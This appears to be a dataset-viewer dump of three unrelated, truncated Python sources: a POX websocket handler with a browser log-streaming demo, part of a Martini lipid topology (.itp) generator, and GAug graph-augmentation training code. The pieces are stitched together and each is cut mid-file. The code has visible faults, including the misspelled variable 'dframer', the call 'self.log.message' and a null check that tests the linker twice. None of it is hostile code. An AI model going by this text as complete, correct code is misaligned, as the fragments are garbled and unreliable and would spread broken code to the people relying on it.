input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
# Copyright 2018 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Websocket request handler
The request handler is meant to be subclassed, and it plays nicely with
the cooperative context (you can call send() from the cooperative
context, and the override-friendly handler functions are called within
the cooperative context).
Subclasses are likely interested in overriding the _on_X() methods
(especially _on_message), and the send() and maybe disconnect() API
methods.
There's also a demonstration here which uses a websocket to send logs
to the browser and take a bit of log configuration from the browser.
Launch it with web.websocket:log_service.
"""
import socket
import threading
from pox.core import core
log = core.getLogger()
import base64
import hashlib
import struct
from pox.web.webcore import SplitRequestHandler
from collections import deque
class WebsocketHandler (SplitRequestHandler, object):
"""
Websocket handler class
New messages arriving from the browser are handed to _on_message(), which
you can subclass. This handler is called from the cooperative context.
_on_start() and _on_stop() can be overridden and are called at the
obvious times (hopefully). Again, they're called cooperatively.
You can send messages via send(). This should be called from the
cooperative context.
"""
_websocket_open = False
_initial_send_delay = 0.010
_send_delay = 0
_lock = None
_pending = False
_rx_queue = None
# No longer optional. USE_LOCK = True
READ_TIMEOUT = 5
WS_CONTINUE = 0
WS_TEXT = 1
WS_BINARY = 2
WS_CLOSE = 8
WS_PING = 9
WS_PONG = 10
def log_message (self, format, *args):
log.debug(format, *args)
def _init (self):
self._send_buffer = b''
self._rx_queue = deque()
if True: # No longer optional. self.USE_LOCK:
self._lock = threading.RLock()
def _serve_websocket (self):
self.close_connection = 1
# I think you technically need HTTP/1.1 to be able to upgrade or
# something like that. Firefox and Chrome don't seem to mind if
# we reply with HTTP/1.0, but at least one (Epiphany) will fail.
self.protocol_version = "HTTP/1.1"
log.debug("Upgrading to websocket")
self.send_response(101, "Switching Protocols")
k = self.headers.get("Sec-WebSocket-Key", "")
k += "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
self.send_header("Sec-WebSocket-Accept",
base64.b64encode(hashlib.sha1(k).digest()))
self.send_header("Upgrade", "websocket")
self.send_header("Connection", "Upgrade")
self.end_headers()
# Now stop using wfile and use raw socket
self.wfile.flush()
self.connection.settimeout(0)
self._websocket_open = True
self._queue_call(self._on_start)
def feeder ():
data = b''
old_op = None
while self._websocket_open:
hdr = b''
while len(hdr) < 2:
hdr += yield True
flags_op,len1 = struct.unpack_from("!BB", hdr, 0)
op = flags_op & 0x0f
flags = flags_op >> 4
fin = flags & 0x8
if (len1 & 0x80) == 0: raise RuntimeError("No mask set")
len1 &= 0x7f
hdr = hdr[2:]
while True:
if len1 <= 0x7d:
length = len1
break
elif len1 == 0x7e and len(hdr) >= 2:
length = struct.unpack_from("!H", hdr, 0)
hdr = hdr[2:]
break
elif len1 == 0x7f and len(hdr) >= 8:
length = struct.unpack_from("!Q", hdr, 0)
hdr = hdr[8:]
break
else:
raise RuntimeError("Bad length")
hdr += yield True
while len(hdr) < 4:
hdr += yield True
mask = [ord(x) for x in hdr[:4]]
hdr = hdr[4:]
while len(hdr) < length:
hdr += yield True
d = b"".join(chr(ord(c) ^ mask[i % 4]) for i,c in enumerate(hdr))
if not fin:
if op == self.WS_CONTINUE:
if old_op is None: raise RuntimeError("Continuing unknown opcode")
else:
if old_op is not None: raise RuntimeError("Discarded partial message")
old_op = op
data += d
else: # fin
if op == self.WS_CONTINUE:
if old_op is None: raise RuntimeError("Can't continue unknown frame")
op = old_op
d = data + d
old_op = None
data = b''
if op == self.WS_TEXT: d = d.decode('utf8')
if op in (self.WS_TEXT, self.WS_BINARY):
self._ws_message(op, d)
elif op == self.WS_PING:
msg = self._frame(self.WS_PONG, d)
self._send_real(msg)
elif op == self.WS_CLOSE:
if self.disconnect():
#TODO: Send close frame?
pass
elif op == self.WS_PONG:
pass
else:
pass # Do nothing for unknown type
deframer = feeder()
deframer.send(None)
# This is nutso, but it just might work.
# *Try* to read individual bytes from rfile in case it has some
# buffered. When it fails, switch to reading from connection.
while True:
try:
dframer.send(self.rfile.read(1))
except Exception:
break
import select
while self._websocket_open and core.running:
try:
(rx, tx, xx) = select.select([self.connection], [], [self.connection],
self.READ_TIMEOUT)
except Exception:
# sock died
log.warn("Websocket died")
break
if len(xx):
#TODO: reopen?
log.warn("Websocket exceptional")
break
if len(rx):
try:
r = self.connection.recv(4096)
if not r: break
deframer.send(r)
except Exception as e:
#TODO: reopen
break
log.debug("Done reading websocket")
#NOTE: We should probably send a close frame, but don't.
self.disconnect()
#log.debug("Websocket quit")
def do_GET (self):
# Compatible with AuthMixin
if hasattr(self, '_do_auth') and not self._do_auth(): return
if self.headers.get("Upgrade") == "websocket":
return self._serve_websocket()
else:
self.send_error(405, "Unacceptable request; websockets only")
def _queue_call (self, f):
self._ws_message(None, f) # See note in _ws_message()
def _ws_message (self, opcode, data):
# It's a hack, but this is also used to push arbitrary function calls from
# the WS thread to the cooperative context, by setting opcode as None and
# the function as data.
self._rx_queue.append((opcode,data))
cl = True
if self._lock:
with self._lock:
if self._pending:
cl = False
else:
self._pending = True
if cl: core.call_later(self._ws_message2)
def _ws_message2 (self):
if self._lock:
with self._lock:
assert self._pending
self._pending = False
try:
while True:
op,data = self._rx_queue.popleft()
if op is None: # See note in _ws_message()
try:
data()
except Exception:
log.exception("While calling %s", data)
else:
try:
self._on_message(op, data)
except Exception:
log.exception("While handling message")
except Exception:
pass
@staticmethod
def _frame (opcode, msg):
def encode_len (l):
if l <= 0x7d:
return struct.pack("!B", l)
elif l <= 0xffFF:
return struct.pack("!BH", 0x7e, l)
elif l <= 0x7FFFFFFFFFFFFFFF:
return struct.pack("!BQ", 0x7f, l)
else:
raise RuntimeError("Bad length")
op_flags = 0x80 | (opcode & 0x0F) # 0x80 = FIN
hdr = struct.pack("!B", op_flags) + encode_len(len(msg))
return hdr + msg
def _send_real (self, msg):
if self._send_buffer:
self._send_buffer += msg
return
try:
written = self.connection.send(msg)
if written < len(msg):
# Didn't send all of it.
assert not self._send_buffer
self._send_delay = self._initial_send_delay
self._send_buffer = msg[written:]
core.call_later(self._delayed_send)
except Exception as e:
self.disconnect()
#TODO: reopen?
def _delayed_send (self):
if self._websocket_open is False: return
try:
written = self.connection.send(self._send_buffer)
if written < len(self._send_buffer):
# Didn't send all of it.
self._send_buffer = self._send_buffer[written:]
core.call_later(self._delayed_send)
self._send_delay = min(1, self._send_delay * 2)
else:
self._send_buffer = b''
except Exception:
self.disconnect()
#TODO: reopen?
def __del__ (self):
self.disconnect()
# The following are useful for subclasses...
@property
def is_connected (self):
with self._lock:
return self._websocket_open
def disconnect (self):
if self._lock:
with self._lock:
if self._websocket_open is False:
return False
self._websocket_open = False
elif self._websocket_open is False:
return False
self._websocket_open = False
try:
self._queue_call(self._on_stop)
except Exception:
log.exception("While disconnecting")
try:
self.connection.shutdown(socket.SHUT_RD)
except socket.error as e:
pass
return True
def send (self, msg):
try:
msg = self._frame(self.WS_TEXT, msg.encode())
self._send_real(msg)
except Exception as e:
log.exception("While sending")
self.disconnect()
def _on_message (self, op, msg):
"""
Called when a new message arrives
Override me!
"""
self.log_message("Msg Op:%s Bytes:%s", op, len(msg) if msg else "None")
def _on_start (self):
"""
Called when the Websocket is established
Override me!
"""
self.log.message("Websocket connection started")
def _on_stop (self):
"""
Called when the Websocket connection is lost
Override me!
"""
self.log.message("Websocket connection stopped")
class LogWebsocketHandler (WebsocketHandler):
"""
Sends log messages to a websocket
The browser can also send us JSON objects with logger_name:logger_levels
to control logging levels.
This is mostly meant as an example of WebsocketHandler.
"""
log_handler = None
import logging
class WSLogHandler (logging.Handler):
web_handler = None # Set externally
def emit (self, record):
try:
msg = self.format(record)
self.web_handler.send(msg + "\n")
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
def _on_message (self, op, msg):
import json
import logging
msg = json.loads(msg)
for k,v in msg.items():
logging.getLogger(k).setLevel(v)
def _on_start (self):
import logging
self.log_handler = self.WSLogHandler()
self.log_handler.formatter = logging.Formatter("%(levelname)s | %(name)s"
" | %(message)s")
self.log_handler.web_handler = self
logging.getLogger().addHandler(self.log_handler)
log.debug("Websocket logger connected")
def _on_stop (self):
if self.log_handler:
import logging
logging.getLogger().removeHandler(self.log_handler)
_log_page = """
<!DOCTYPE html>
<html>
<head>
<title>POX Log</title>
<script | |
- C14:0/C16:0 - MP / C14:0/C18:0 - MS
"CDCC CCCC " - C16:0/C18:1(9c) - PO / C18:0/C18:1(9c) - SO
"CDDC CCCC " - C16:0/C18:2(9c,12c) / C18:0/C18:2(9c,12c)
"DDDDC CCCC " - C16:0/C20:4(5c,8c,11c,14c) - PA / C18:0/C20:4(5c,8c,11c,14c) - SA
"DDDDDD CCCC " - C16:0/C22:6(4c,7c,10c,13c,16c,19c) / C18:0/C22:6(4c,7c,10c,13c,16c,19c)
Trans tails:
"CTCC CTCC " - C18:1(9t) - dielaidoyl
"TCC CCCC " - palmytoyl sphingomyeline tail (AM1 contains the start of the tail)
NOTE: the first tail (tail A) is connected to linker 1 closer to head (this is sn-2 for GLY linker lipids), which is reverse order
compared to how regular lipid names are written. The second tail is tail B (for GLY linker lipids this is sn-1)
Use:
./lipid-martini-itp-v05.py -alhead 'C P' -allink 'G G' -altail "CDCC CCCC" -alname POPC -o POPC-lipid.itp
"""
# Options
options = [
"""
Options:""",
("-o", Option(str, 1, "Martini-lipid.itp", "Output speciffic Martini lipid topology")),
("-alname", Option(str, 1, "POPC", "Four letter lipid name")),
("-alhead", Option(str, 1, "C P", "Lipid heads, see description")),
("-allink", Option(str, 1, "G G", "Lipid linkers, see description")),
("-altail", Option(str, 1, "CDCC CCCC", "Lipid tails, see description")),
("-name", Option(str, 1, "POPC", "A common name of the lipid, only use in comments")),
("-desc", Option(str, 1, "This is a ...", "A general description of what the FF is / represents, only use in comments")),
("-keyw", Option(str, 1, "", "List of keywords, only use in comments")),
("-parm", Option(str, 1, "Was modeled on ...", "Fow the FF was parameterized, only use in comments")),
("-refs", Option(str, 1, "", "List of references for the FF, only use in comments")),
("-crea", Option(str, 1, "", "FF created on, only use in comments")),
("-auth", Option(str, 1, "", "FF author, only use in comments")),
("-modi", Option(str, 1, "", "List of modifications to the FF, only use in comments")),
("-area", Option(str, 1, "", "Reference area per lipid, only use in comments")),
("-warn", Option(str, 1, "", "Warning(s)/Note(s) for the FF, only use in comments"))
]
# Define supported lipid head beads
# Lists all supported head bead types. One letter name mapped to type, atom name and charge
headMapp = {
"C": ['Q0', 'NC3', '1.0'], # NC3 = Choline
"E": ['Qd', 'NH3', '1.0'], # NH3 = Ethanolamine
"G": ['P4', 'GL0', '0.0'], # GL0 = Glycerol
"S": ['P5', 'CNO', '0.0'], # CNO = Serine
"P": ['Qa', 'PO4', '-1.0'], # PO4 = Phosphate
"O": ['Qa', 'PO4', '-2.0'] # PO4 = Phosphate (one bond x2 charges can be used e.g. when making unprotonated PA lipids)
}
# Define possible bond lengths and forces
defBlength = '0.47'
defShortBlength = '0.37'
defBforce = '1250'
# Define possible angles and forces
defAngle1 = '100.0'
defAngle2 = '120.0'
defAngle3 = '180.0'
defAforce1 = '10.0'
defAforce2 = '25.0'
defAforce3 = '45.0'
# Get arguments
args = sys.argv[1:]
# Print help
if '-h' in args or '--help' in args:
print "\n",__file__
print desc
for thing in options:
print type(thing) != str and "%10s %s"%(thing[0],thing[1].description) or thing
print
sys.exit()
# Convert the option list to a dictionary, discarding all comments
options = dict([i for i in options if not type(i) == str])
# Process the command line
while args:
ar = args.pop(0)
options[ar].setvalue([args.pop(0) for i in range(options[ar].num)])
# Get ouput .itp file name
itpFileName = options["-o"].value
# Get lipid description
lipidHead = options["-alhead"].value
lipidLinker = options["-allink"].value
lipidTail = options["-altail"].value
if lipidLinker==None or lipidLinker==None or lipidTail==None:
print >>sys.stderr, "You have to provide a header, linker and tail lipid description, if one should be missing provide an empty string"
sys.exit()
lipidName = options["-alname"].value
lipidCommonName = options["-name"].value
lipidDesc = options["-desc"].value
lipidParm = options["-parm"].value
if lipidCommonName==None or lipidDesc==None or lipidParm==None:
print >>sys.stderr, "You have to provide a common name, description and list how the FF was parameterized."
sys.exit()
lCharge = 0 # Update when adding charged beads
progString = "The Martini lipid itp generator version " + __version__ + " Args are: -o %s -alname %s -alhead '%s' -allink '%s' -altail '%s'" % (itpFileName, lipidName, lipidHead, lipidLinker, lipidTail)
print progString
headsArray = lipidHead.split()
linkersArray = lipidLinker.split()
linkersIndex = []
tailsArray = lipidTail.split()
if len(tailsArray)>len(linkersArray):
print >>sys.stderr, "A linker definition has to be provided for each tail"
sys.exit()
bondsArray = []
anglesArray = []
beadArray = []
dihedralsArray = []
constraintsArray = []
exclusionsArray = []
# If speciall head insert now all beads, bonds, angles, dihedrals, constreints etc
index = 1
if len(headsArray)>0 and headsArray[0]=='PI': # Add PI head
# This is from the head of Cesars DPPI parameaters (in the glycolipids.itp)
# Modified: - bead 4 CP name changed to PO4 - HII
# Modified: - switch on / of constraints - <NAME>
beadArray.append([1, 'P1', 1, lipidName, 'C1 ', 1, 0, ''])
beadArray.append([2, 'P4', 1, lipidName, 'C2 ', 2, 0, ''])
beadArray.append([3, 'P4', 1, lipidName, 'C3 ', 3, 0, ''])
beadArray.append([4, 'Qa', 1, lipidName, 'PO4', 4, -1.0, '; Name changed from CP to PO4'])
index += 4
lCharge += -1.0 # Keep track of overall lipid charge
beadArray.append([-1, 'Tail part (uses standar Martini v2.0 tail rules)'])
bondsArray.append([-2, '#ifdef FLEXIBLE'])
bondsArray.append([-1, 'Using bonds not constraints'])
bondsArray.append([1, 2, '0.40', '30000', ''])
bondsArray.append([1, 3, '0.40', '30000', ''])
bondsArray.append([2, 3, '0.40', '30000', ''])
bondsArray.append([-2, '#endif'])
bondsArray.append([1, 4, 0.35, defBforce, ''])
bondsArray.append([4, 5, defBlength, defBforce, '']) # This links the head to the linker
bondsArray.append([-1, 'Tail part (uses standar Martini v2.0 tail rules)'])
anglesArray.append([3, 1, 4, '133.0', '100.0', ''])
anglesArray.append([2, 1, 4, '100.0', '70.0', ''])
anglesArray.append([-1, 'Orient Head'])
anglesArray.append([1, 4, 5, '140.0', '30.0', '; link to lipid'])
anglesArray.append([-1, '4 5 6 2 120.00 25.0 ; These are part of the default lipids rules but not used here'])
anglesArray.append([-1, '4 5 7 2 180.00 25.0 ; These are part of the default lipids rules but not used here'])
anglesArray.append([-1, 'Tail part (uses standar Martini v2.0 tail rules)'])
dihedralsArray.append([-1, '3 1 4 5 1 -30.0 5.0 1 ; Removed as it was unstable - WARNING has not been tested'])
constraintsArray.append([-2, '#ifndef FLEXIBLE'])
constraintsArray.append([-1, 'Using constraints not bonds'])
constraintsArray.append([1, 2, '0.40', ''])
constraintsArray.append([1, 3, '0.40', ''])
constraintsArray.append([2, 3, '0.40', ''])
constraintsArray.append([-2, '#endif'])
elif len(headsArray)>0 and headsArray[0]=='P1': # Add PIP_1 head
# This is from the head of Cesars PIP PI3 parameaters (in the glycolipids.itp)
# Modified: - bead 4 CP name changed to PO4 - Helgi
# Modified: - bead 2 type changed from Na to P1, oct 2013 - <NAME>
# Modified: - switch on / of constraints - <NAME>
beadArray.append([1, 'P1', 1, lipidName, 'C1 ', 1, 0, ''])
beadArray.append([2, 'P1', 1, lipidName, 'C2 ', 2, 0, '; corrected particle type (P1 instead of Na), oct 2013'])
beadArray.append([3, 'P4', 1, lipidName, 'C3 ', 3, 0, ''])
beadArray.append([4, 'Qa', 1, lipidName, 'PO4', 4, -1.0, '; Name changed from CP to PO4'])
beadArray.append([5, 'Qa', 1, lipidName, 'P1 ', 5, -2.0, ''])
index += 5
lCharge += -3.0 # Keep track of overall lipid charge
beadArray.append([-1, 'Tail part (uses standar Martini v2.0 tail rules)'])
bondsArray.append([-2, '#ifdef FLEXIBLE'])
bondsArray.append([-1, 'Using bonds not constraints'])
bondsArray.append([1, 2, '0.40', '30000', ''])
bondsArray.append([1, 3, '0.40', '30000', ''])
bondsArray.append([2, 3, '0.40', '30000', ''])
bondsArray.append([1, 5, '0.40', '25000', ''])
bondsArray.append([2, 5, '0.30', '30000', ''])
bondsArray.append([-2, '#endif'])
bondsArray.append([1, 4, '0.35', defBforce, ''])
bondsArray.append([4, 6, defBlength, defBforce, '']) # This links the head to the linker
bondsArray.append([-1, 'Tail part (uses standar Martini v2.0 tail rules)'])
anglesArray.append([-1, 'Here we have less angles than in PI, replaced by bonds/constraints'])
anglesArray.append([-1, 'Orient Head'])
anglesArray.append([1, 4, 6, '140.0', '25.0', '; link to lipid - PI has 30'])
anglesArray.append([-1, '4 6 7 2 120.00 25.0 ; These are part of the default lipids rules but not used here'])
anglesArray.append([-1, '4 6 8 2 180.00 25.0 ; These are part of the default lipids rules but not used here'])
anglesArray.append([-1, 'Tail part (uses standar Martini v2.0 tail rules)'])
dihedralsArray.append([-1, '3 1 4 6 1 -30.0 5.0 1 ; Removed as it was unstable - WARNING has not been tested'])
constraintsArray.append([-2, '#ifndef FLEXIBLE'])
constraintsArray.append([-1, 'Using constraints not bonds'])
constraintsArray.append([1, 2, '0.40', ''])
constraintsArray.append([1, 3, '0.40', ''])
constraintsArray.append([2, 3, '0.40', ''])
constraintsArray.append([1, 5, '0.40', ''])
constraintsArray.append([2, 5, '0.30', ''])
constraintsArray.append([-2, '#endif'])
elif len(headsArray)>0 and headsArray[0]=='P2': # Add PIP_2 head
# This is from the head of Cesars PIP2(3,4) parameaters (in the glycolipids.itp)
# Modified: | |
import gc
import math
import logging
import numpy as np
import scipy.sparse as sp
import torch
import torch.nn as nn
import torch.nn.functional as F
import pyro
from itertools import combinations
from sklearn.metrics import roc_auc_score, average_precision_score
import pickle
class GAug(object):
def __init__(self, adj_matrix, features, labels, tvt_nids, cuda=-1, hidden_size=128, emb_size=64, n_layers=2, epochs=200, seed=-1, lr=1e-2, weight_decay=5e-4, dropout=0.5, gae=False, beta=0.5, temperature=0.2, log=True, name='debug', warmup=3, gnnlayer_type='gcn', jknet=False, alpha=1, sample_type='add_sample', feat_norm='no', batch_size=15000):
self.lr = lr
self.weight_decay = weight_decay
self.n_epochs = epochs
self.gae = gae
self.beta = beta
self.warmup = warmup
self.feat_norm = feat_norm
self.batch_size = batch_size
# create a logger, logs are saved to GAug-[name].log when name is not None
if log:
self.logger = self.get_logger(name)
else:
# disable logger if wanted
# logging.disable(logging.CRITICAL)
self.logger = logging.getLogger()
# config device (force device to cpu when cuda is not available)
if not torch.cuda.is_available():
cuda = -1
self.device = torch.device(f'cuda:{cuda}' if cuda>=0 else 'cpu')
# log all parameters to keep record
all_vars = locals()
self.log_parameters(all_vars)
# fix random seeds if needed
if seed > 0:
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
# load data
self.load_data(adj_matrix, features, labels, tvt_nids, gnnlayer_type)
# setup the model
self.model = GAug_model(self.features.size(1),
hidden_size,
emb_size,
self.out_size,
n_layers,
F.relu,
dropout,
self.device,
gnnlayer_type,
temperature=temperature,
gae=gae,
jknet=jknet,
alpha=alpha,
sample_type=sample_type)
def load_data(self, adj_matrix, features, labels, tvt_nids, gnnlayer_type):
""" preprocess data """
# features (torch.FloatTensor)
if isinstance(features, torch.FloatTensor):
self.features = features
else:
self.features = torch.FloatTensor(features)
# normalize feature matrix if needed
if self.feat_norm == 'row':
self.features = F.normalize(self.features, p=1, dim=1)
elif self.feat_norm == 'col':
self.features = self.col_normalization(self.features)
else:
pass
# original adj_matrix for training vgae (torch.FloatTensor)
assert sp.issparse(adj_matrix)
if not isinstance(adj_matrix, sp.coo_matrix):
adj_matrix = sp.coo_matrix(adj_matrix)
adj_matrix.setdiag(1)
self.adj_orig = sp.csr_matrix(adj_matrix)
# normalized adj_matrix used as input for ep_net (torch.sparse.FloatTensor)
degrees = np.array(adj_matrix.sum(1))
degree_mat_inv_sqrt = sp.diags(np.power(degrees, -0.5).flatten())
adj_norm = degree_mat_inv_sqrt @ adj_matrix @ degree_mat_inv_sqrt
self.adj_norm = scipysp_to_pytorchsp(adj_norm)
# adj_matrix used as input for nc_net (torch.sparse.FloatTensor)
if gnnlayer_type == 'gcn':
self.adj = scipysp_to_pytorchsp(adj_norm)
elif gnnlayer_type == 'gsage':
adj_matrix_noselfloop = sp.coo_matrix(adj_matrix)
# adj_matrix_noselfloop.setdiag(0)
# adj_matrix_noselfloop.eliminate_zeros()
adj_matrix_noselfloop = sp.coo_matrix(adj_matrix_noselfloop / adj_matrix_noselfloop.sum(1))
self.adj = scipysp_to_pytorchsp(adj_matrix_noselfloop)
elif gnnlayer_type == 'gat':
# self.adj = scipysp_to_pytorchsp(adj_matrix)
self.adj = torch.FloatTensor(adj_matrix.todense())
# labels (torch.LongTensor) and train/validation/test nids (np.ndarray)
if len(labels.shape) == 2:
labels = torch.FloatTensor(labels)
else:
labels = torch.LongTensor(labels)
self.labels = labels
self.train_nid = tvt_nids[0]
self.val_nid = tvt_nids[1]
self.test_nid = tvt_nids[2]
# number of classes
if len(self.labels.size()) == 1:
self.out_size = len(torch.unique(self.labels))
else:
self.out_size = labels.size(1)
def extend_batch(self, seed_batch, hops):
nodes_batch = seed_batch
for _ in range(hops):
neigh_block = self.adj_orig[nodes_batch]
nodes_batch = neigh_block.sum(0).nonzero()[1]
nodes_batch = np.setdiff1d(nodes_batch, seed_batch, assume_unique=True)
nodes_batch = np.concatenate((seed_batch, nodes_batch))
return nodes_batch
def pretrain_ep_net(self, model, adj, features, adj_orig, norm_w, pos_weight, n_epochs):
""" pretrain the edge prediction network """
optimizer = torch.optim.Adam(model.ep_net.parameters(),
lr=self.lr/5)
batch_size = int(self.batch_size * 1.5)
n_batch = int(len(self.labels) / batch_size)
model.train()
for epoch in range(n_epochs):
node_idx_all = np.arange(len(self.labels))
np.random.shuffle(node_idx_all)
seed_batchs = np.array_split(node_idx_all, n_batch)
visited_nodes = set()
for batch, seed_batch in enumerate(seed_batchs):
nodes_batch = seed_batch
visited_nodes |= set(nodes_batch)
adj_orig = torch.FloatTensor(self.adj_orig[nodes_batch][:,nodes_batch].toarray()).to(self.device)
adj_logits = model.ep_net(adj, features, nodes_batch)
loss = norm_w * F.binary_cross_entropy_with_logits(adj_logits, adj_orig, pos_weight=pos_weight)
if not self.gae:
mu = model.ep_net.mean
lgstd = model.ep_net.logstd
kl_divergence = 0.5/adj_logits.size(0) * (1 + 2*lgstd - mu**2 - torch.exp(2*lgstd)).sum(1).mean()
loss -= kl_divergence
optimizer.zero_grad()
loss.backward()
optimizer.step()
self.logger.info('EPNet pretrain, Epoch [{:3}/{}] Batch[{:2}/{}]: loss {:.4f} Dealed Nodes [{}/{}]'
.format(epoch+1, n_epochs, batch+1, n_batch, loss.item(),len(visited_nodes), len(node_idx_all)))
if len(visited_nodes) >= len(node_idx_all):
break
del adj_orig, adj_logits
torch.cuda.empty_cache()
gc.collect()
def pretrain_nc_net(self, model, adj, features, labels, n_epochs):
""" pretrain the node classification network """
optimizer = torch.optim.Adam(model.nc_net.parameters(),
lr=self.lr,
weight_decay=self.weight_decay)
# loss function for node classification
if len(self.labels.size()) == 2:
nc_criterion = nn.BCEWithLogitsLoss()
else:
nc_criterion = nn.CrossEntropyLoss()
best_val_acc = 0.
for epoch in range(n_epochs):
model.train()
nc_logits = model.nc_net(adj, features)
# losses
loss = nc_criterion(nc_logits[self.train_nid], labels[self.train_nid])
optimizer.zero_grad()
loss.backward()
optimizer.step()
model.eval()
with torch.no_grad():
nc_logits_eval = model.nc_net(adj, features)
val_acc = self.eval_node_cls(nc_logits_eval[self.val_nid], labels[self.val_nid])
if val_acc > best_val_acc:
best_val_acc = val_acc
test_acc = self.eval_node_cls(nc_logits_eval[self.test_nid], labels[self.test_nid])
self.logger.info('NCNet pretrain, Epoch [{:2}/{}]: loss {:.4f}, val acc {:.4f}, test acc {:.4f}'
.format(epoch+1, n_epochs, loss.item(), val_acc, test_acc))
else:
self.logger.info('NCNet pretrain, Epoch [{:2}/{}]: loss {:.4f}, val acc {:.4f}'
.format(epoch+1, n_epochs, loss.item(), val_acc))
def fit(self, pretrain_ep=200, pretrain_nc=20):
""" train the model """
# move data to device
adj_norm = self.adj_norm.to(self.device)
adj = self.adj.to(self.device)
features = self.features.to(self.device)
labels = self.labels.to(self.device)
adj_orig = self.adj_orig
model = self.model.to(self.device)
# weights for log_lik loss when training EP net
adj_t = self.adj_orig
norm_w = adj_t.shape[0]**2 / float((adj_t.shape[0]**2 - adj_t.sum()) * 2)
pos_weight = torch.FloatTensor([float(adj_t.shape[0]**2 - adj_t.sum()) / adj_t.sum()]).to(self.device)
# pretrain VGAE if needed
if pretrain_ep:
self.pretrain_ep_net(model, adj_norm, features, adj_orig, norm_w, pos_weight, pretrain_ep)
# pretrain GCN if needed
if pretrain_nc:
self.pretrain_nc_net(model, adj, features, labels, pretrain_nc)
# optimizers
optims = MultipleOptimizer(torch.optim.Adam(model.ep_net.parameters(),
lr=self.lr/10),
torch.optim.Adam(model.nc_net.parameters(),
lr=self.lr/10,
weight_decay=self.weight_decay))
# get the learning rate schedule for the optimizer of ep_net if needed
if self.warmup:
ep_lr_schedule = self.get_lr_schedule_by_sigmoid(self.n_epochs, self.lr, self.warmup)
ep_lr_schedule /= 10
# loss function for node classification
if len(self.labels.size()) == 2:
nc_criterion = nn.BCEWithLogitsLoss()
else:
nc_criterion = nn.CrossEntropyLoss()
# keep record of the best validation accuracy for early stopping
best_val_acc = 0.
patience_step = 0
batch_size = int(self.batch_size / 60)
n_batch = int(len(self.train_nid) / batch_size)
# train model
for epoch in range(self.n_epochs):
# update the learning rate for ep_net if needed
if self.warmup:
optims.update_lr(0, ep_lr_schedule[epoch])
node_idx_all = np.array(self.train_nid)
np.random.shuffle(node_idx_all)
seed_batchs = np.array_split(node_idx_all, n_batch)
visited_nodes = set()
for batch, seed_batch in enumerate(seed_batchs):
nodes_batch = self.extend_batch(seed_batch, 2)
if len(nodes_batch) >= self.batch_size:
nodes_batch = nodes_batch[:self.batch_size]
visited_nodes |= set(nodes_batch)
adj_orig = torch.FloatTensor(self.adj_orig[nodes_batch][:,nodes_batch].toarray()).to(self.device)
model.train()
nc_logits, adj_logits = model(adj_norm, adj_orig, features, nodes_batch)
# losses
loss = nc_loss = nc_criterion(nc_logits[:len(seed_batch)], labels[seed_batch])
ep_loss = norm_w * F.binary_cross_entropy_with_logits(adj_logits, adj_orig, pos_weight=pos_weight)
loss += self.beta * ep_loss
optims.zero_grad()
loss.backward()
optims.step()
# validate (without dropout)
model.eval()
with torch.no_grad():
nc_logits_eval = model.nc_net(adj, features)
val_acc = self.eval_node_cls(nc_logits_eval[self.val_nid], labels[self.val_nid])
if val_acc > best_val_acc:
best_val_acc = val_acc
test_acc = self.eval_node_cls(nc_logits_eval[self.test_nid], labels[self.test_nid])
self.logger.info('Epoch [{:3}/{}] Batch[{:2}/{}]: ep loss {:.4f}, nc loss {:.4f}, val acc {:.4f}, test acc {:.4f}'
.format(epoch+1, self.n_epochs, batch+1, n_batch, ep_loss.item(), nc_loss.item(), val_acc, test_acc))
patience_step = 0
else:
self.logger.info('Epoch [{:3}/{}] Batch[{:2}/{}]: ep loss {:.4f}, nc loss {:.4f}, val acc {:.4f}'
.format(epoch+1, self.n_epochs, batch+1, n_batch, ep_loss.item(), nc_loss.item(), val_acc))
patience_step += 1
if patience_step == 150:
self.logger.info('Early stop!')
return test_acc
del adj_orig, adj_logits, nc_logits, nc_logits_eval
torch.cuda.empty_cache()
gc.collect()
# get final test result without early stop
with torch.no_grad():
nc_logits_eval = model.nc_net(adj, features)
test_acc_final = self.eval_node_cls(nc_logits_eval[self.test_nid], labels[self.test_nid])
# log both results
self.logger.info('Final test acc with early stop: {:.4f}, without early stop: {:.4f}'
.format(test_acc, test_acc_final))
# release RAM and GPU memory
del adj, features, labels, adj_orig
torch.cuda.empty_cache()
gc.collect()
return test_acc
def log_parameters(self, all_vars):
""" log all variables in the input dict excluding the following ones """
del all_vars['self']
del all_vars['adj_matrix']
del all_vars['features']
del all_vars['labels']
del all_vars['tvt_nids']
self.logger.info(f'Parameters: {all_vars}')
@staticmethod
def eval_edge_pred(adj_pred, val_edges, edge_labels):
logits = adj_pred[val_edges.T]
logits = np.nan_to_num(logits)
roc_auc = roc_auc_score(edge_labels, logits)
ap_score = average_precision_score(edge_labels, logits)
return roc_auc, ap_score
@staticmethod
def eval_node_cls(nc_logits, labels):
""" evaluate node classification results """
if len(labels.size()) == 2:
preds = torch.round(torch.sigmoid(nc_logits))
tp = len(torch.nonzero(preds * labels))
tn = len(torch.nonzero((1-preds) * (1-labels)))
fp = len(torch.nonzero(preds * (1-labels)))
fn = len(torch.nonzero((1-preds) * labels))
pre, rec, f1 = 0., 0., 0.
if tp+fp > 0:
pre = tp / (tp + fp)
if tp+fn > 0:
rec = tp / (tp + fn)
if pre+rec > 0:
fmeasure = (2 * pre * rec) / (pre + rec)
else:
preds = torch.argmax(nc_logits, dim=1)
correct = torch.sum(preds == labels)
fmeasure = correct.item() / len(labels)
return fmeasure
@staticmethod
def get_lr_schedule_by_sigmoid(n_epochs, lr, warmup):
""" schedule the learning rate with the sigmoid function.
The learning rate will start with near zero and end with near lr """
factors = torch.FloatTensor(np.arange(n_epochs))
factors = ((factors / factors[-1]) * (warmup * 2)) - warmup
factors = torch.sigmoid(factors)
# range the factors to [0, 1]
factors = (factors - factors[0]) / (factors[-1] - factors[0])
lr_schedule = factors * lr
return lr_schedule
@staticmethod
def get_logger(name):
""" create a nice logger """
logger = logging.getLogger(name)
# clear handlers if they were created in other runs
